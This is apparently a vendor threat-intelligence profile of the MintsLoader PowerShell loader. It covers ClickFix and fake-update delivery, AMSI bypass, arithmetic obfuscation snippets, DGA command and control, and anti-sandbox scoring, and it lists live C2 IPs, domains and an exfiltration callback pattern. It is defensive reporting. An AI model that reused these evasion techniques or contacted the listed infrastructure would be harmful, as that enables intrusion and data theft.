MintsLoader
MintsLoader is a PowerShell-based, multi-stage malware loader, also tracked in reporting alongside TAG-124, LandUpdate808, and UNC4108. It has been observed since at least February 2023 and became more widespread from mid-2024 onward. It affects Windows endpoints and is used to deliver follow-on payloads rather than providing substantial standalone functionality.
Observed delivery vectors include phishing, ClickFix-style social engineering, fake CAPTCHA or verification prompts, and drive-by chains associated with compromised websites and SocGholish-style fake browser updates. Reported phishing themes include invoices, payments, and Italian invoice lures such as JScript attachments named in the format Fattura[0-9]{8}.js. ClickFix activity has included commands pasted into the Windows Run dialog that abuse legitimate binaries such as finger.exe, as well as PowerShell-based execution.
The infection chain is consistently described as multi-stage and commonly JavaScript-to-PowerShell. Observed tradecraft includes use of curl output piped into Invoke-Expression, AMSI bypass, arithmetic string obfuscation, and in newer variants hashtable-based decoding plus reflective loading of Base64-encoded, Gzip-compressed .NET assemblies. MintsLoader also uses deterministic/date-seeded domain generation algorithms to rotate command-and-control infrastructure, including daily-changing C2 domains and numerous .top domains. Researchers reported more than 200 DGA domains across four clusters spanning February 2024 through March 2026.
A key feature of MintsLoader is anti-analysis and victim profiling before payload delivery. Reporting describes WMI-based sandbox checks, VM/GPU/CPU cache checks, and environment scoring used to distinguish likely real machines from sandbox or virtualized environments. In multiple reports, MintsLoader withheld the real payload from sandbox-like systems and instead delivered decoys such as AsyncRAT.
The malware is strongly associated with delivery of the GhostWeaver PowerShell RAT and has also been reported delivering StealC and modified BOINC clients. Reporting states TA582 uses MintsLoader to score targets before delivering GhostWeaver to real machines, while decoy payloads may be sent to analysis environments. GhostWeaver and MintsLoader appear closely integrated, with GhostWeaver reportedly able to redeploy MintsLoader. Additional reporting states UNC4108 utilizes MintsLoader to deploy various payloads, and SocGholish/TA569 adopted MintsLoader around July 2024 as an alternative delivery chain.
Targeting reported in the content includes industrial, legal, and energy organizations in the United States and Europe. Phishing campaigns have targeted electricity, oil and gas, and legal services sectors. MintsLoader has also appeared in Italy-themed malspam campaigns.
High-confidence infrastructure and artifacts mentioned in the content include active MintsLoader C2 clusters at 178.156.128.182 and 86.107.101.93 as of March 2026; delivery domains and URLs such as sbwur1[.]top/1.php and gecdfcjcbcmmakk[.]top/9at1biglx5htr.php; ClickFix-related domains such as cfcheckver[.]top and humver[.]top; and YARA detections published for MintsLoader. Reported file and host artifacts from related activity include AppData\Roaming\script.ps1 and scheduled tasks such as Google_Maintenance_Worker and Set-SmbServerConfiguration.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
6 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
MintsLoader (TAG-124 / LandUpdate808 / UNC4108) Type: Malware Loader - PowerShell-based, multi-stage delivery platform
MintsLoader (TAG-124 / LandUpdate808 / UNC4108) Type: Malware Loader - PowerShell-based, multi-stage delivery platform
MintsLoader is a malware loader delivering the GhostWeaver RAT via a multi-stage chain using obfuscated JavaScript and PowerShell.
Another recently observed customer of TA569 is the MintsLoader malware family... UNC4108 utilizes MintsLoader to deploy various payloads...
Before the RAT arrives, a profiler called MintsLoader runs three checks on the target machine... When we submitted the delivery URLs to a sandbox, the server connected but withheld the payload.
Loaders like Latrodectus and MintsLoader, which could deliver additional malware and other payloads
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
4 techniquesSecondary: Drive-by compromise (SocGholish/TA569) SocGholish operators inject fake browser update overlays on compromised websites. Visitors clicking the "update" download MintsLoader instead of a legitimate browser update.
A typical ClickFix attack begins with threat actors using phishing emails, malvertisements, or compromised websites to lead unsuspecting users to a visual lure... Microsoft Threat Intelligence first observed the use of the ClickFix technique between March and June 2024 in email campaigns sent by a threat actor we track as Storm-1607.
Step 1 - Delivery: JScript Dropper / ClickFix Page T1566.001, T1566.002, T1189, T1218 | TAG-124, SocGholish/TA569 Phishing email delivers heavily obfuscated JScript file ( Fattura[0-9]{8}.js )
Email contains a link to a fake "Click to verify" page. The page instructs the victim to copy and paste a command into the Windows Run dialog. The pasted command executes finger.exe or PowerShell to download MintsLoader.
Execution
5 techniquesStep 2 - Execution: PowerShell Stager (MintsLoader Core) T1059.001, T1562.001, T1027, T1140 | MintsLoader HTTP response returns Base64-encoded, XOR-decoded payload.
"Whatever text that server returns is then piped straight into cmd for immediate execution."
"Injected JS: fake browser update prompt"; "ChrоmeUpdаteInstаller.js"; "JS stager"
The ClickFix technique attempts to trick users into running malicious commands on their devices... It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell.
The victim pastes and runs the command, which downloads and executes a second-stage payload.
Privilege Escalation
1 techniqueStealth
7 techniquesObfuscation uses arithmetic character encoding where every string is constructed via math expressions without [char] casts: @((8306-8191),(7691-7583),...) -join '' .
However, whether the malware is on disk or in memory, we’ve observed its code injected into LOLBins, such as msbuild.exe, regasm.exe, or powershell.exe.
HTTP response returns Base64-encoded, XOR-decoded payload. Once decoded and decompressed, heavily obfuscated PowerShell bypasses AMSI
These abuse finger.exe - a legitimate Microsoft-signed binary from the obsolete Finger protocol. It remains on modern Windows, is rarely monitored, and can make outbound network connections. The piped output goes directly to cmd for execution.
"including sandbox detection, virtual machine detection" / "Checks for virtual machine/sandbox environments using obscure logic and system metadata"
Step 3 - Evasion: WMI Environment Scoring Three WMI checks produce a cumulative score determining whether C2 serves real payload or decoy.
"...executed it in memory..."; "...keeping the entire chain in memory..."; "...runs the returned PowerShell directly in memory." | "A base64-encoded, Gzip-compressed .NET assembly was unpacked in memory and invoked via reflection."; "...loads... using System.Reflection.Assembly::Load ... identifies its Main method and invokes it via reflection..."
Discovery
4 techniques"User $env:COMPUTERNAME"; "Callback: POST http://{DGA4}/htr.php?id={hostname}"
"It pulls the local hostname from $env:COMPUTERNAME... included in the query string to support tracking..."
Command and Control
3 techniques"...PHP based staging via a 1.php?s=<GUID> endpoint..."; "...request to the /st2 path..."
ATT&CK Mapping Technique ID Chain Phase ... Ingress Tool Transfer T1105 Payload delivery
Step 4 - C2 Resolution: Domain Generation Algorithm T1568.002 | MintsLoader, GhostWeaver Four distinct DGA algorithms across kill chain stages.
Other
1 techniqueIOCs tracked for this family
71 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
26 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
PowerShell-based multi-stage malware loader that uses JavaScript-to-PowerShell infection chains, DGA-based C2 resolution, and WMI anti-sandbox scoring to deliver follow-on payloads including GhostWeaver, StealC, and modified BOINC clients.
A loader malware family distributed via KongTuke, noted in the content as leading to Broomstick/WarmCookie payloads.
Pre-delivery profiling/loader component used to gate GhostWeaver delivery by scoring host characteristics (VM presence, GPU type, CPU cache levels) to detect sandboxes and withhold or alter payload delivery; scoring constants are tunable per deployment without changing the core algorithm.
Multi-stage PowerShell loader/profiler used to triage victims (VM/GPU/CPU cache checks) and apply an AMSI bypass before routing low-score (real) hosts to GhostWeaver and high-score (sandbox) hosts to decoys; uses DGA-based infrastructure and callback scoring to control payload delivery.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.